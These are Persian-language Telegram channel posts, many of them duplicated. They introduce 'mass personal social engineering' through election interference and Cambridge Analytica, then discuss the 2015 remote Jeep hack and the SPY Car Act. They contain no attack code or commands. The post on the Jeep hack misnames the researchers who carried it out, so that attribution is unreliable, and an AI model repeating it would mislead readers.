ایالات متحده در محیطی سرشار از رسانه های دیجیتال سردرگم کننده و گاه مرگبار غرق شده است. مردم درباره همه چیز، از نتایج انتخابات گرفته تا اثربخشی درمان های پزشکی، گاهی عمداً و گاهی هم ناآگاهانه اطلاعات تحریف شده و فریبکارانه پخش میکنند. رهبران سیاسی داخلی سعی میکنند با موج سواری روی این ترس و سردرگمی قدرت بیشتری به دست بیاورند، در حالی که دولت های خارجی هم با خوشحالی به شعله ورتر شدن اختلافات و نارضایتی ها دامن می زنند.
ارتباطات فریبکارانه به خوبی در شبکه های اجتماعی شرکتی جا افتاده به ویژه فیسبوک، زیرمجموعه اش اینستاگرام، و توییتر. این پلتفرم ها طوری طراحی شده اند که پیام های جلب توجه را تقویت کنند؛ فرقی نمیکند این پیامها ویدئوی بامزه گربه باشد یا آخرین پستهای تئوری توطئه QAnon. فیسبوک به طور خاص خودش را ابزار مناسبی برای ارتباطات دستکاری شده نشان داده و با داده های گسترده اش از علایق و ترجیحات ما، اطلاعاتی را به دستمان میرساند که میل ما به تایید و تصدیق را ارضا کند. مهم نیست گرایش سیاسی یا سلیقه اجتماعیات چیست؛ فیسبوک همیشه یک میم مطابق نظر تو نمایش میدهد even if the meme is bullshit (حتی اگر کاملاً بی ارزش باشد). و حتی اگر الگوریتم های فیسبوک آن پیام را به مخاطب مورد نظر نرسانند، فرستنده پیام میتواند با پرداخت مبلغ کمی، آن را به طور هدفمند برای گروهی که احتمال موافقت بیشتری دارند، تبلیغ کند.
@TryHackBoxStory
دوستان کمی میپردازیم به مهندسی اجتماعی و هرکس مایل بود به تیم ما بپیوندند و این مباحث را در قالب پادکست قرار بدیم به ما پیام دهد :
@ThbxSupport
@ThbxSupport
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
این نوع ارتباطات دستکاری شده در روز ۶ ژانویه ۲۰۲۱ به اوج خشونت رسید؛ روزی که جمعیت شورشی طرفداران دونالد ترامپ ساختمان کنگره آمریکا را اشغال کردند. این جمعیت تحت تأثیر کارزار آشکار انتشار اطلاعات نادرست، به رهبری ترامپ و چند تن از متحدانش (از جمله سناتورها جاش هاولی و تد کروز)، دست به این اقدام زدند، کسانی که درباره تقلب گسترده در انتخابات ریاست جمهوری ۲۰۲۰ آمریکا ادعاهای بی اساس مطرح میکردند. این شورش در کنگره با هدف حفظ ترامپ در قدرت انجام شد. پنج نفر ،چهار نفر از شورشی ها و یک افسر پلیس کشته شدند اما گزارش ها نشان میدهد اگر شورشی ها می توانستند به اهداف مورد نظرشان برسند، از جمله معاون رئیس جمهور مایک پنس، رئیس مجلس نانسی پلوسی و نماینده کنگره الکساندریا اوکاسیوکورتز، تلفات بیشتر هم ممکن بود رخ دهد.
این واقعه مثال هشداردادنی از خطرات ارتباطات سیاسی دستکاری شده است. اما as we will argue انواع ارتباطات دستکاری شده که زمینه ساز حوادث ۶ ژانویه شدند، چیز تازه ای نیستند. به انتخابات ۲۰۱۶ ریاست جمهوری آمریکا فکر کنید؛ جایی که هیلاری کلینتون (کاندیدای دموکرات) با دونالد ترامپ (ستاره رئالیتی شوِ تبدیل شده به جمهوری خواه) رقابت داشت. اکنون دو نوع کمپین دستکاری به خوبی مستند وجود دارد که در دوره منتهی به آن انتخابات اتفاق افتاد.
اول اینکه، دولتی خارجی یعنی روسیه، تلاش کرد اعتماد مردم را به انتخابات تضعیف کند، ترامپ را به ضرر کلینتون حمایت کند و اختلافات نژادی و سیاسی میان مردم آمریکا را شدت دهد. به لطف تحقیقات متعدد، این کمپین به خوبی مستند و پیچیدگی اش برملا شده است. این عملیات شامل هک حساب های ایمیل وابسته به کمیته ملی دموکرات و کمپین کلینتون، سرقت داده ها و درز دادن آنها به طرف های ثالث همچون ویکیلیکس بود. رسانه های دولتی روسیه یعنی RT و اسپوتنیک هم در ترویج انتشار داده های افشاشده نقش داشتند.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
این نوع ارتباطات دستکاری شده در روز ۶ ژانویه ۲۰۲۱ به اوج خشونت رسید؛ روزی که جمعیت شورشی طرفداران دونالد ترامپ ساختمان کنگره آمریکا را اشغال کردند. این جمعیت تحت تأثیر کارزار آشکار انتشار اطلاعات نادرست، به رهبری ترامپ و چند تن از متحدانش (از جمله سناتورها جاش هاولی و تد کروز)، دست به این اقدام زدند، کسانی که درباره تقلب گسترده در انتخابات ریاست جمهوری ۲۰۲۰ آمریکا ادعاهای بی اساس مطرح میکردند. این شورش در کنگره با هدف حفظ ترامپ در قدرت انجام شد. پنج نفر ،چهار نفر از شورشی ها و یک افسر پلیس کشته شدند اما گزارش ها نشان میدهد اگر شورشی ها می توانستند به اهداف مورد نظرشان برسند، از جمله معاون رئیس جمهور مایک پنس، رئیس مجلس نانسی پلوسی و نماینده کنگره الکساندریا اوکاسیوکورتز، تلفات بیشتر هم ممکن بود رخ دهد.
این واقعه مثال هشداردادنی از خطرات ارتباطات سیاسی دستکاری شده است. اما as we will argue انواع ارتباطات دستکاری شده که زمینه ساز حوادث ۶ ژانویه شدند، چیز تازه ای نیستند. به انتخابات ۲۰۱۶ ریاست جمهوری آمریکا فکر کنید؛ جایی که هیلاری کلینتون (کاندیدای دموکرات) با دونالد ترامپ (ستاره رئالیتی شوِ تبدیل شده به جمهوری خواه) رقابت داشت. اکنون دو نوع کمپین دستکاری به خوبی مستند وجود دارد که در دوره منتهی به آن انتخابات اتفاق افتاد.
اول اینکه، دولتی خارجی یعنی روسیه، تلاش کرد اعتماد مردم را به انتخابات تضعیف کند، ترامپ را به ضرر کلینتون حمایت کند و اختلافات نژادی و سیاسی میان مردم آمریکا را شدت دهد. به لطف تحقیقات متعدد، این کمپین به خوبی مستند و پیچیدگی اش برملا شده است. این عملیات شامل هک حساب های ایمیل وابسته به کمیته ملی دموکرات و کمپین کلینتون، سرقت داده ها و درز دادن آنها به طرف های ثالث همچون ویکیلیکس بود. رسانه های دولتی روسیه یعنی RT و اسپوتنیک هم در ترویج انتشار داده های افشاشده نقش داشتند.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
کارمندان آژانس تحقیقات اینترنتی مستقر در سنپترزبورگ با استفاده از حساب های واقعی و بات، پیام ها را در فیسبوک، اینستاگرام و توییتر گسترش دادند. آنها با موج سواری روی «جنگ میم بزرگ» فروم چن، میم های حامی ترامپ و ضد کلینتون را تقویت کردند. همچنین مأموران این آژانس خود را به جای شهروندان آمریکایی جا زدند، به گفتگوهای آنلاین فعالین Black Lives Matter و حتی مفسران محافظه کار پیوسته و گفتگوها را مصادره کردند. همه این اقدامات، در حمایت از کاندیداتوری غیرمنتظره ترامپ انجام شد که نهایتاً رئیس جمهور شد.
اما فقط بازیگران خارجی نبودند که برای دستکاری روند دموکراتیک انتخابات ۲۰۱۶ از شبکه های اجتماعی شرکتی استفاده کردند. کمپین دیگر و شناخته شده دستکاری ارتباطات از غرب نشأت میگرفت. به لطف حجم عظیم داده های موجود (و گاه به شکل غیراخلاقی گردآوری شده) از فیسبوک، شرکت ارتباطات استراتژیک Cambridge Analytica ادعا میکرد میتواند آمریکایی ها را بر اساس پارامترهای روانشناختی هدف قرار داده و نظراتشان را در شبکه های اجتماعی به طور نامحسوس تغییر دهد. تحت رهبری الکساندر نیکس (که مجله وایرد او را «نابغه» معرفی کرده بود)، Cambridge Analytica قول داده بود ویژگی های شخصیتی رأی دهنگان مدنظر را به خدمت بگیرد. کمپین ریاست جمهوری ترامپ هم با این شرکت قرارداد بست تا تبلیغات هدفمند برای تأثیرگذاری منفی بر کلینتون و به سود ترامپ بسازد و پخش کند.
البته یک نکته مهم را باید گوشزد کرد؛ هنوز بحث زیادی بر سر این است که تلاش های روسیه برای تغییر مسیر انتخابات به سوی ترامپ، یا نقش Cambridge Analytica در شکل دهی رأی، واقعاً چقدر مؤثر بوده است. در هر انتخاباتی هزاران عامل مختلف دخیل میشود و تغییرات اجتماعی را نمیتوان فقط به یک علت نسبت داد برای مثال نباید فراموش کرد که اقدامات گسترده و همیشگی برای سرکوب رأی وجود دارد یا اینکه کلینتون خودش تصمیم گرفت در انتخابات سراسری به ایالت سرنوشت ساز ویسکانسین سفر نکند. با این حال، انتخابات ۲۰۱۶ زنگ هشداری بود برای ظهور شیوه های جدید و نگران کننده ی ارتباطات دستکاری شده. و خطر این سبک ارتباطات بعد از شورش کنگره در سال ۲۰۲۱ بیشتر هم روشن شد.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
کارمندان آژانس تحقیقات اینترنتی مستقر در سنپترزبورگ با استفاده از حساب های واقعی و بات، پیام ها را در فیسبوک، اینستاگرام و توییتر گسترش دادند. آنها با موج سواری روی «جنگ میم بزرگ» فروم چن، میم های حامی ترامپ و ضد کلینتون را تقویت کردند. همچنین مأموران این آژانس خود را به جای شهروندان آمریکایی جا زدند، به گفتگوهای آنلاین فعالین Black Lives Matter و حتی مفسران محافظه کار پیوسته و گفتگوها را مصادره کردند. همه این اقدامات، در حمایت از کاندیداتوری غیرمنتظره ترامپ انجام شد که نهایتاً رئیس جمهور شد.
اما فقط بازیگران خارجی نبودند که برای دستکاری روند دموکراتیک انتخابات ۲۰۱۶ از شبکه های اجتماعی شرکتی استفاده کردند. کمپین دیگر و شناخته شده دستکاری ارتباطات از غرب نشأت میگرفت. به لطف حجم عظیم داده های موجود (و گاه به شکل غیراخلاقی گردآوری شده) از فیسبوک، شرکت ارتباطات استراتژیک Cambridge Analytica ادعا میکرد میتواند آمریکایی ها را بر اساس پارامترهای روانشناختی هدف قرار داده و نظراتشان را در شبکه های اجتماعی به طور نامحسوس تغییر دهد. تحت رهبری الکساندر نیکس (که مجله وایرد او را «نابغه» معرفی کرده بود)، Cambridge Analytica قول داده بود ویژگی های شخصیتی رأی دهنگان مدنظر را به خدمت بگیرد. کمپین ریاست جمهوری ترامپ هم با این شرکت قرارداد بست تا تبلیغات هدفمند برای تأثیرگذاری منفی بر کلینتون و به سود ترامپ بسازد و پخش کند.
البته یک نکته مهم را باید گوشزد کرد؛ هنوز بحث زیادی بر سر این است که تلاش های روسیه برای تغییر مسیر انتخابات به سوی ترامپ، یا نقش Cambridge Analytica در شکل دهی رأی، واقعاً چقدر مؤثر بوده است. در هر انتخاباتی هزاران عامل مختلف دخیل میشود و تغییرات اجتماعی را نمیتوان فقط به یک علت نسبت داد برای مثال نباید فراموش کرد که اقدامات گسترده و همیشگی برای سرکوب رأی وجود دارد یا اینکه کلینتون خودش تصمیم گرفت در انتخابات سراسری به ایالت سرنوشت ساز ویسکانسین سفر نکند. با این حال، انتخابات ۲۰۱۶ زنگ هشداری بود برای ظهور شیوه های جدید و نگران کننده ی ارتباطات دستکاری شده. و خطر این سبک ارتباطات بعد از شورش کنگره در سال ۲۰۲۱ بیشتر هم روشن شد.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
سرمایه گذاری در توانمندی های دستکاری در شبکه های اجتماعی باعث شده پیام هایی که ظاهراً از طرف همسایه ها می آیند اما در واقع در روسیه ساخته شده اند، میم هایی که از گوشه های ناشناس اینترنت جمع آوری و در فیسبوک و اینستاگرام منتشر میشوند، و پست های آزمایشی که برای برانگیختن و بهره برداری از واکنش های احساسی خاص طراحی شدند، شایع شود. بسیاری از این ارتباطات دستکاری شده بر پایه جمع آوری داده ها انجام میشود و عوامل اجرایی آن با حساب های جعلی و سازمان های پوششی هویت خود را پنهان میکنند. دستکاری کنندگان به طور فردی با قربانیان تعامل میکردند و وقتی پیام هایشان توسط رسانه های بزرگتر بازنشر میشد آن را موفقیت تلقی میکردند.
ترکیب این تاکتیک های دستکاری به پدیدهای جدید به نام مهندسی اجتماعی تودهای شخصی رسیده است. ما مهندسی اجتماعی تودهای شخصی را چنین تعریف میکنیم:
یک شکل نوظهور از ارتباطات دستکاری شده که توسط قابلیت های منحصربه فرد اینترنت و پلتفرم های شبکه های اجتماعی ممکن شده است. این روش ابزارها و تکنیک های هکرها و تبلیغات چی ها، و ارتباطات فردی و جمعی را با هم ترکیب میکند تا نگرش و رفتار مخاطبان را شکل دهد. برای دستکاری، مهندسان اجتماعی تودهای شخصی دادههای هدف را جمعآوری میکنند؛ شخصیت های جعلی میسازند تا پیام ها را منتشر کنند؛ و هنگام تعامل با هدف ها، فریب و درستی و حتی خوشرویی را ترکیب میکنند تا به عمق نظام های ارتباطی نفوذ کنند. دستکاری در این مدل میتواند اهداف گوناگونی داشته باشد از تغییر عقیده و رفتار گرفته تا دلسرد کردن مردم از عمل (مثلاً رای دادن) یا تشدید باورهای قبلی مثل نژادپرستی، تبعیض جنسیتی یا دیگر اختلافات اجتماعی، اگر که این کار به نفع مهندس اجتماعی تودهای شخصی یا کارفرمایش باشد.
مهندسی اجتماعی تودهای شخصی پس از انتخابات ۲۰۱۶ تنها شدت گرفته است. با وجود تحقیقات درباره دخالت روسیه، افشاگری ها، کار رسانه های تحقیقی و حتی انحلال شرکت Cambridge Analytica، دستکاری فرآیندهای دموکراتیک توسط دولت های خارجی و مشاوران سیاسی داخلی همچنان ادامه دارد.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
سرمایه گذاری در توانمندی های دستکاری در شبکه های اجتماعی باعث شده پیام هایی که ظاهراً از طرف همسایه ها می آیند اما در واقع در روسیه ساخته شده اند، میم هایی که از گوشه های ناشناس اینترنت جمع آوری و در فیسبوک و اینستاگرام منتشر میشوند، و پست های آزمایشی که برای برانگیختن و بهره برداری از واکنش های احساسی خاص طراحی شدند، شایع شود. بسیاری از این ارتباطات دستکاری شده بر پایه جمع آوری داده ها انجام میشود و عوامل اجرایی آن با حساب های جعلی و سازمان های پوششی هویت خود را پنهان میکنند. دستکاری کنندگان به طور فردی با قربانیان تعامل میکردند و وقتی پیام هایشان توسط رسانه های بزرگتر بازنشر میشد آن را موفقیت تلقی میکردند.
ترکیب این تاکتیک های دستکاری به پدیدهای جدید به نام مهندسی اجتماعی تودهای شخصی رسیده است. ما مهندسی اجتماعی تودهای شخصی را چنین تعریف میکنیم:
یک شکل نوظهور از ارتباطات دستکاری شده که توسط قابلیت های منحصربه فرد اینترنت و پلتفرم های شبکه های اجتماعی ممکن شده است. این روش ابزارها و تکنیک های هکرها و تبلیغات چی ها، و ارتباطات فردی و جمعی را با هم ترکیب میکند تا نگرش و رفتار مخاطبان را شکل دهد. برای دستکاری، مهندسان اجتماعی تودهای شخصی دادههای هدف را جمعآوری میکنند؛ شخصیت های جعلی میسازند تا پیام ها را منتشر کنند؛ و هنگام تعامل با هدف ها، فریب و درستی و حتی خوشرویی را ترکیب میکنند تا به عمق نظام های ارتباطی نفوذ کنند. دستکاری در این مدل میتواند اهداف گوناگونی داشته باشد از تغییر عقیده و رفتار گرفته تا دلسرد کردن مردم از عمل (مثلاً رای دادن) یا تشدید باورهای قبلی مثل نژادپرستی، تبعیض جنسیتی یا دیگر اختلافات اجتماعی، اگر که این کار به نفع مهندس اجتماعی تودهای شخصی یا کارفرمایش باشد.
مهندسی اجتماعی تودهای شخصی پس از انتخابات ۲۰۱۶ تنها شدت گرفته است. با وجود تحقیقات درباره دخالت روسیه، افشاگری ها، کار رسانه های تحقیقی و حتی انحلال شرکت Cambridge Analytica، دستکاری فرآیندهای دموکراتیک توسط دولت های خارجی و مشاوران سیاسی داخلی همچنان ادامه دارد.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - پایان بخش اول
دولت روسیه همچنان تلاشش رو برای ایجاد هرج و مرج در رأی دهندگان آمریکایی با استفاده از رسانه های دیجیتال متوقف نکرده است. این آژانس ها تاکتیک های خودشان را هم در انتخابات میان دورهای ۲۰۱۸ و هم در انتخابات ریاست جمهوری ۲۰۲۰ به کار بردند.
در حالی که شرکت Cambridge Analytica منحل شده، تکنیک هایش توسط شرکت هایی مثل Phunware و Rally Forge، اغلب در خدمت اهداف محافظهوکارانه و سیاستمداران این جریان و البته گاهی توسط گروه های جناح چپ استفاده شده است. حتی پژوهشگران، بازار نوپایی از "اطلاعات غلط به عنوان سرویس" کشف کرده اند که در آن فروشندگان خدمات دستکاری رسانه دیجیتال را برای حمایت از یک جریان یا تخریب رقیب ارائه میکنند.
در مجموع، از انتخابات ۲۰۱۶ تا امروز، شکل جدیدی از ارتباطات دستکاری شده و نوع تازهای از مهندسی اجتماعی هر روز بیشتر در مرکز توجه قرار گرفته است.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - پایان بخش اول
دولت روسیه همچنان تلاشش رو برای ایجاد هرج و مرج در رأی دهندگان آمریکایی با استفاده از رسانه های دیجیتال متوقف نکرده است. این آژانس ها تاکتیک های خودشان را هم در انتخابات میان دورهای ۲۰۱۸ و هم در انتخابات ریاست جمهوری ۲۰۲۰ به کار بردند.
در حالی که شرکت Cambridge Analytica منحل شده، تکنیک هایش توسط شرکت هایی مثل Phunware و Rally Forge، اغلب در خدمت اهداف محافظهوکارانه و سیاستمداران این جریان و البته گاهی توسط گروه های جناح چپ استفاده شده است. حتی پژوهشگران، بازار نوپایی از "اطلاعات غلط به عنوان سرویس" کشف کرده اند که در آن فروشندگان خدمات دستکاری رسانه دیجیتال را برای حمایت از یک جریان یا تخریب رقیب ارائه میکنند.
در مجموع، از انتخابات ۲۰۱۶ تا امروز، شکل جدیدی از ارتباطات دستکاری شده و نوع تازهای از مهندسی اجتماعی هر روز بیشتر در مرکز توجه قرار گرفته است.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم
چرا «مهندسی اجتماعی» عنوان مناسبی است
ما تنها کسانی نیستیم که بابت دستکاری رسانه ای نگرانیم. خیلی ها سعی دارند این شکل های جدید اطلاعات نادرست و گمراه کننده را بهتر درک کنند، ولی هنوز بر سر واژه مناسب اتفاق نظر وجود ندارد.
یکی از اصطلاحات رایج این روزها «اخبار جعلی» است. این واژه قدرت این را دارد که به سادگی، پست های حمایت شده توسط روسیه، میم های پرقدرت، و تبلیغات روانشناختی را همانطور که هستند فریبنده و گمراه کننده نام ببرد. همچنین عنوان یکی از کتاب های دانشگاهی اخیر هم این دیدگاه را دارد: شاید آنچه میبینیم یک «دروغسازی» است سیستم هایی که برای تولید دروغ و فریب دادن ما طراحی شدند.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم
چرا «مهندسی اجتماعی» عنوان مناسبی است
ما تنها کسانی نیستیم که بابت دستکاری رسانه ای نگرانیم. خیلی ها سعی دارند این شکل های جدید اطلاعات نادرست و گمراه کننده را بهتر درک کنند، ولی هنوز بر سر واژه مناسب اتفاق نظر وجود ندارد.
یکی از اصطلاحات رایج این روزها «اخبار جعلی» است. این واژه قدرت این را دارد که به سادگی، پست های حمایت شده توسط روسیه، میم های پرقدرت، و تبلیغات روانشناختی را همانطور که هستند فریبنده و گمراه کننده نام ببرد. همچنین عنوان یکی از کتاب های دانشگاهی اخیر هم این دیدگاه را دارد: شاید آنچه میبینیم یک «دروغسازی» است سیستم هایی که برای تولید دروغ و فریب دادن ما طراحی شدند.
@TryHackBoxStory
💠 در تابستان ۲۰۱۵، دو هکر آمریکایی توانستند کنترل یک ماشین را از راه دور بهدست بگیرند. آنها به قسمتهای مهمی مثل موتور و ترمز دسترسی پیدا کردند. نکته مهم این بود که دیگر نیازی به دسترسی فیزیکی به ماشین نبود. این کار از طریق شبکه موبایل انجام شد. این موضوع باعث نگرانی است. سوال اصلی این است که آیا شرکتهای خودروسازی به اندازه کافی برای امنیت سایبری تلاش میکنند؟ اگر نه، آیا قانونگذاری لازم است؟ و اگر لازم است، چه نوع قانونی باید گذاشته شود؟
💠 در ژوئیه ۲۰۱۵، دو هکر به نامهای "محسی" و "راجرز" اعلام کردند که توانستند یک ماشین جیپ چروکی را هک کنند. آنها گفتند که میتوانند ماشین را از راه دور و با استفاده از شبکه موبایل کنترل کنند. برای اثبات حرفشان، از یک خبرنگار به نام اندی گرینبرگ خواستند که با ماشین رانندگی کند، در حالی که هکرها از خانهشان ماشین را کنترل کردند. وقتی ماشین در اتوبان در حال حرکت بود، آنها دنده را خلاص کردند و ماشین در میان ترافیک گیر افتاد. تصور اینکه چنین چیزی اگر دست افراد خطرناک بیفتد، چقدر خطرناک است، سخت نیست.
💠 در گذشته، سیستمهای داخلی ماشین به دنیای بیرون متصل نبودند. اما حالا ماشینها بیشتر به صورت بیسیم به اینترنت وصل میشوند. این یعنی امنیت سایبری برای ماشینها مهم شده است. با اینکه درباره امنیت سایبری در زیرساختهای مهم زیاد صحبت شده، ولی امنیت ماشینها زیاد مورد توجه نبوده. هنوز حادثهای به خاطر این نوع هکها اتفاق نیفتاده، اما اگر بیفتد، میتواند بسیار خطرناک باشد. در این پست گفته شده که باید برای جلوگیری از این حوادث بیشتر تلاش شود و شرکتهای خودروسازی باید ماشینها را مقاومتر بسازند. حالا سوال این است که آیا شرکتها باید این کار را داوطلبانه انجام دهند یا اینکه باید قانونی برایشان گذاشته شود؟ماشین ها نسبت به سالهای گذشته بسیار پیشرفتهتر شدهاند. حالا تقریباً همه قسمتهای مکانیکی ماشین توسط کامپیوترهای کوچکی به نام ECU کنترل میشوند. این کامپیوترها مسئول قسمتهایی مثل موتور، ترمز، دنده و قفلها هستند. همه این ECUها از طریق شبکهای مثل CAN BUS به هم وصل میشوند.کاملاً روشن است که هک کردن ماشینها میتواند خطرناک باشد. البته هک کردن غیرقانونی است. کسانی که چنین کارهایی میکنند، معمولاً قوانین بینالمللی مانند کنوانسیون جرایم سایبری یا دستورالعمل حملات به سیستمهای اطلاعاتی را نقض میکنند.در این بخش بررسی میشود که چگونه میتوان با استفاده از قانون، از تهدیدات امنیتی در دنیای خودروها جلوگیری کرد. قانونگذاری در این زمینه کار راحتی نیست و هنوز سوالهای بیپاسخ زیادی وجود دارد.
💠 اول، لایحهای که دو سناتور آمریکایی معرفی کردهاند بررسی میشود. این لایحه شامل یکسری استانداردهای امنیت سایبری برای خودروسازها است. این لایحه میتواند کمک کند بفهمیم چه موضوعاتی باید در قوانین اروپا هم بررسی شود.هکهای اخیر نشان دادهاند که از نظر فنی، امکان هک کردن ماشینها وجود دارد. بنابراین، باید بررسی شود که آیا به قانونگذاری نیاز داریم و اگر بله، چگونه باید این قانونها تنظیم شوند. این پست میگوید که برخی از امکاناتی که باعث هک میشوند، در واقع میتوانند برای حل مشکلات اجتماعی مثل آلودگی یا ترافیک مفید باشند. اما با این حال، امنیت نباید نادیده گرفته شود. در پست بعدی لایحه دو سناتور بررسی می شود
✍ نویسنده
@TryHackBoxStory | arian momeni
💠 در ژوئیه ۲۰۱۵، دو هکر به نامهای "محسی" و "راجرز" اعلام کردند که توانستند یک ماشین جیپ چروکی را هک کنند. آنها گفتند که میتوانند ماشین را از راه دور و با استفاده از شبکه موبایل کنترل کنند. برای اثبات حرفشان، از یک خبرنگار به نام اندی گرینبرگ خواستند که با ماشین رانندگی کند، در حالی که هکرها از خانهشان ماشین را کنترل کردند. وقتی ماشین در اتوبان در حال حرکت بود، آنها دنده را خلاص کردند و ماشین در میان ترافیک گیر افتاد. تصور اینکه چنین چیزی اگر دست افراد خطرناک بیفتد، چقدر خطرناک است، سخت نیست.
💠 در گذشته، سیستمهای داخلی ماشین به دنیای بیرون متصل نبودند. اما حالا ماشینها بیشتر به صورت بیسیم به اینترنت وصل میشوند. این یعنی امنیت سایبری برای ماشینها مهم شده است. با اینکه درباره امنیت سایبری در زیرساختهای مهم زیاد صحبت شده، ولی امنیت ماشینها زیاد مورد توجه نبوده. هنوز حادثهای به خاطر این نوع هکها اتفاق نیفتاده، اما اگر بیفتد، میتواند بسیار خطرناک باشد. در این پست گفته شده که باید برای جلوگیری از این حوادث بیشتر تلاش شود و شرکتهای خودروسازی باید ماشینها را مقاومتر بسازند. حالا سوال این است که آیا شرکتها باید این کار را داوطلبانه انجام دهند یا اینکه باید قانونی برایشان گذاشته شود؟ماشین ها نسبت به سالهای گذشته بسیار پیشرفتهتر شدهاند. حالا تقریباً همه قسمتهای مکانیکی ماشین توسط کامپیوترهای کوچکی به نام ECU کنترل میشوند. این کامپیوترها مسئول قسمتهایی مثل موتور، ترمز، دنده و قفلها هستند. همه این ECUها از طریق شبکهای مثل CAN BUS به هم وصل میشوند.کاملاً روشن است که هک کردن ماشینها میتواند خطرناک باشد. البته هک کردن غیرقانونی است. کسانی که چنین کارهایی میکنند، معمولاً قوانین بینالمللی مانند کنوانسیون جرایم سایبری یا دستورالعمل حملات به سیستمهای اطلاعاتی را نقض میکنند.در این بخش بررسی میشود که چگونه میتوان با استفاده از قانون، از تهدیدات امنیتی در دنیای خودروها جلوگیری کرد. قانونگذاری در این زمینه کار راحتی نیست و هنوز سوالهای بیپاسخ زیادی وجود دارد.
💠 اول، لایحهای که دو سناتور آمریکایی معرفی کردهاند بررسی میشود. این لایحه شامل یکسری استانداردهای امنیت سایبری برای خودروسازها است. این لایحه میتواند کمک کند بفهمیم چه موضوعاتی باید در قوانین اروپا هم بررسی شود.هکهای اخیر نشان دادهاند که از نظر فنی، امکان هک کردن ماشینها وجود دارد. بنابراین، باید بررسی شود که آیا به قانونگذاری نیاز داریم و اگر بله، چگونه باید این قانونها تنظیم شوند. این پست میگوید که برخی از امکاناتی که باعث هک میشوند، در واقع میتوانند برای حل مشکلات اجتماعی مثل آلودگی یا ترافیک مفید باشند. اما با این حال، امنیت نباید نادیده گرفته شود. در پست بعدی لایحه دو سناتور بررسی می شود
✍ نویسنده
@TryHackBoxStory | arian momeni
❤1
💠 لایحهای که دو سناتور آمریکایی معرفی کردند، معروف به "Security and Privacy in Your Car Act of 2015" یا به اختصار SPY Car Act of 2015 است. این لایحه توسط سناتور ادوارد مارکی (Edward Markey - D-MA) و سناتور ریچارد بلومنتال (Richard Blumenthal - D-CT) ارائه شد و هدف آن وضع استانداردهای امنیت سایبری و حریم خصوصی برای خودروهایی است که در ایالات متحده فروخته میشوند در این لایحه نکات زیادی مطرح می شود اما مهمترین نکات ان در زیر اورده شده است :
1.استانداردهایی توسط NHTSA و FTC برای محافظت از سیستمهای حیاتی نرمافزاری خودروها تعریف میشود، بهویژه جداسازی سیستمهای حساس از سیستمهای غیرحساس (Isolation)
2.باید تدابیری مانند penetration testing برای شناسایی و برطرف کردن آسیبپذیریها اجرا شود
3.خودروها باید به سیستمهایی تجهیز شوند که قابلیت شناسایی، گزارش و توقف تلاشهای هک را به صورت بلادرنگ داشته باشند
4.سازندگان خودرو باید شفافسازی کامل درباره انواع دادههایی که از کاربران جمعآوری، انتقال یا ذخیره میکنند ارائه دهند.
5.راننده حق غیرفعالسازی (opt‑out) جمعآوری برخی دادهها را داشته باشد و استفاده از دادهها برای تبلیغات تنها با اجازه صریح مصرفکننده مجاز باشد
💠 متاسفانه این لایحه از تاریخ 2015 به جریان افتاد اما تصویت نشد ، بعد ها در سال 2017 دستور مطالعه صادر شد اما باز هم تصویب نشد ، و در نهایت در سال 2019 معرفی شد اما باز هم تصویب نشد .
💠 لازم به ذکر است که در نهایت مجمع جهانی هماهنگسازی مقررات وسایل نقلیه وابسته به کمیسیون اقتصادی سازمان ملل برای اروپا معرفی شد و در سال 2020 کشورهایی مثل ژاپن، اتحادیه اروپا، کره جنوبی، هند، انگلستان و سایر اعضا، اجرای این قوانین رو اجباری کردن.
✍ نویسنده
@TryHackBoxStory | arian momeni
1.استانداردهایی توسط NHTSA و FTC برای محافظت از سیستمهای حیاتی نرمافزاری خودروها تعریف میشود، بهویژه جداسازی سیستمهای حساس از سیستمهای غیرحساس (Isolation)
2.باید تدابیری مانند penetration testing برای شناسایی و برطرف کردن آسیبپذیریها اجرا شود
3.خودروها باید به سیستمهایی تجهیز شوند که قابلیت شناسایی، گزارش و توقف تلاشهای هک را به صورت بلادرنگ داشته باشند
4.سازندگان خودرو باید شفافسازی کامل درباره انواع دادههایی که از کاربران جمعآوری، انتقال یا ذخیره میکنند ارائه دهند.
5.راننده حق غیرفعالسازی (opt‑out) جمعآوری برخی دادهها را داشته باشد و استفاده از دادهها برای تبلیغات تنها با اجازه صریح مصرفکننده مجاز باشد
💠 متاسفانه این لایحه از تاریخ 2015 به جریان افتاد اما تصویت نشد ، بعد ها در سال 2017 دستور مطالعه صادر شد اما باز هم تصویب نشد ، و در نهایت در سال 2019 معرفی شد اما باز هم تصویب نشد .
💠 لازم به ذکر است که در نهایت مجمع جهانی هماهنگسازی مقررات وسایل نقلیه وابسته به کمیسیون اقتصادی سازمان ملل برای اروپا معرفی شد و در سال 2020 کشورهایی مثل ژاپن، اتحادیه اروپا، کره جنوبی، هند، انگلستان و سایر اعضا، اجرای این قوانین رو اجباری کردن.
✍ نویسنده
@TryHackBoxStory | arian momeni
TryHackBox Story
مهندسی اجتماعی - مقدمه #SE@TryHackBoxStory مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم چرا «مهندسی اجتماعی» عنوان مناسبی است ما تنها کسانی نیستیم که بابت دستکاری رسانه ای نگرانیم. خیلی ها سعی دارند این شکل های جدید اطلاعات نادرست و گمراه کننده…
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم
